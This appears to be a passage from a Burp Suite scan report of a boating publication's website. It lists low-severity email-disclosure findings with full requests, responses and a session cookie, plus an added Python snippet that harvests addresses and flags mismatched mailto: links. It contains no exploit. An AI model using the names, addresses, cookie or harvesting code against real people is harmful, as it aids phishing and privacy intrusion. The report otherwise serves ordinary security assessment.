Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.195. http://www.soundingsonline.com/career-opportunities

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /career-opportunities

Issue detail

The following email addresses were disclosed in the response:

Request

GET /career-opportunities HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:s.jylkka@soundingspub.com">
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.196. http://www.soundingsonline.com/columns-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.197. http://www.soundingsonline.com/columns-blogs/bay-tripper

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/bay-tripper

Issue detail

The following email addresses were disclosed in the response:

Request

GET /columns-blogs/bay-tripper HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.198. http://www.soundingsonline.com/columns-blogs/books

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/books

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /columns-blogs/books HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.199. http://www.soundingsonline.com/columns-blogs/new-england-fishing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/new-england-fishing

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /columns-blogs/new-england-fishing HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.200. http://www.soundingsonline.com/columns-blogs/under-way

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /columns-blogs/under-way

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /columns-blogs/under-way HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.201. http://www.soundingsonline.com/component/chronocontact/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/chronocontact/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /component/chronocontact/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.202. http://www.soundingsonline.com/component/content/article/237622

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/content/article/237622

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /component/content/article/237622 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.203. http://www.soundingsonline.com/component/yvcomment/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /component/yvcomment/

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /component/yvcomment/ HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.204. http://www.soundingsonline.com/contact-us

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /contact-us

Issue detail

The following email addresses were disclosed in the response (the mailto: link for s.vasmatics@soundingspub.com is labelled m.grzybowski@soundingspub.com, so both addresses are exposed):

e.cirillo@soundingspub.com
circulation@soundingspub.com
advertising@soundingspub.com
editorial@soundingspub.com
s.vasmatics@soundingspub.com
m.grzybowski@soundingspub.com
webmaster@soundingspub.com
info@soundingspub.com

Request

GET /contact-us HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:circulation@soundingspub.com">circulation@soundingspub.com</a>
...[SNIP]...
<a href="mailto:advertising@soundingspub.com">advertising@soundingspub.com</a>
...[SNIP]...
<a href="mailto:editorial@soundingspub.com">editorial@soundingspub.com</a>
...[SNIP]...
<a href="mailto:s.vasmatics@soundingspub.com">m.grzybowski@soundingspub.com</a>
...[SNIP]...
<a href="mailto:webmaster@soundingspub.com">webmaster@soundingspub.com</a>
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...
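
The /contact-us response above contains one mailto: link whose href and visible text name different addresses (s.vasmatics vs. m.grzybowski). A check that reads only link text, or only hrefs, reports one of the two. The Python below is an added example, not the crawler's own logic: it scans the raw response body for addresses (so attributes and text are both covered) and separately flags mailto: links whose target and label disagree. SAMPLE_RESPONSE is constructed from the excerpt above and is not a live fetch.

```python
import re
from html.parser import HTMLParser

# Constructed sample: the lines of the /contact-us response excerpt that carry
# addresses, including the mismatched mailto: link. Not fetched live.
SAMPLE_RESPONSE = """<br />
The administrator email is e.cirillo@soundingspub.com<br />
<a href="mailto:circulation@soundingspub.com">circulation@soundingspub.com</a>
<a href="mailto:s.vasmatics@soundingspub.com">m.grzybowski@soundingspub.com</a>
<a href="mailto:webmaster@soundingspub.com">webmaster@soundingspub.com</a>
"""

# Pragmatic address pattern for response scanning. It accepts less than
# RFC 5322 allows and can over-match on odd input; for a scanner that bias
# (report, then triage) is the right one.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def disclosed_addresses(body: str) -> list[str]:
    """Every address anywhere in the raw response (markup, attributes and
    text alike), de-duplicated and sorted for stable reporting."""
    return sorted(set(EMAIL_RE.findall(body)))


class _MailtoLinks(HTMLParser):
    """Collects (href address, visible text) for each <a href="mailto:..."> link."""

    def __init__(self) -> None:
        super().__init__()
        self._href = None   # address of the mailto: link currently open, if any
        self._text = []     # text fragments seen inside that link
        self.links = []     # finished (href address, label) pairs

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href") or ""
            if href.lower().startswith("mailto:"):
                # Drop the scheme and any ?subject=... query part.
                self._href = href[len("mailto:"):].split("?", 1)[0]
                self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def mailto_mismatches(body: str) -> list[tuple[str, str]]:
    """mailto: links whose target differs from the label shown to the user.
    Each such link discloses two addresses, and only the href one is reached
    by clicking it."""
    parser = _MailtoLinks()
    parser.feed(body)
    return [(href, text) for href, text in parser.links
            if href.lower() != text.lower()]


if __name__ == "__main__":
    for address in disclosed_addresses(SAMPLE_RESPONSE):
        print("disclosed:", address)
    for href, text in mailto_mismatches(SAMPLE_RESPONSE):
        print(f"mailto mismatch: href={href} label={text}")
```

Running the block on the constructed sample reports five addresses and one mismatch. Scanning the raw body rather than the rendered text is what makes the href-only address show up; the mismatch check is the extra signal a triager wants, since it usually means a stale or mis-edited contact page rather than an intentional alias.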

21.205. http://www.soundingsonline.com/features

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.206. http://www.soundingsonline.com/features/destinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/destinations

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/destinations HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.207. http://www.soundingsonline.com/features/in-depth

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/in-depth

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/in-depth HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.208. http://www.soundingsonline.com/features/justyesterday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/justyesterday

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/justyesterday HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:36 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
<a href="mailto:info@soundingspub.com">info@soundingspub.com</a>
...[SNIP]...

21.209. http://www.soundingsonline.com/features/lifestyle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /features/lifestyle

Issue detail

The following email addresses were disclosed in the response:

e.cirillo@soundingspub.com
info@soundingspub.com

Request

GET /features/lifestyle HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:19:18 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<br />
The administrator email is e.cirillo@soundingspub.com<br />
...[SNIP]...
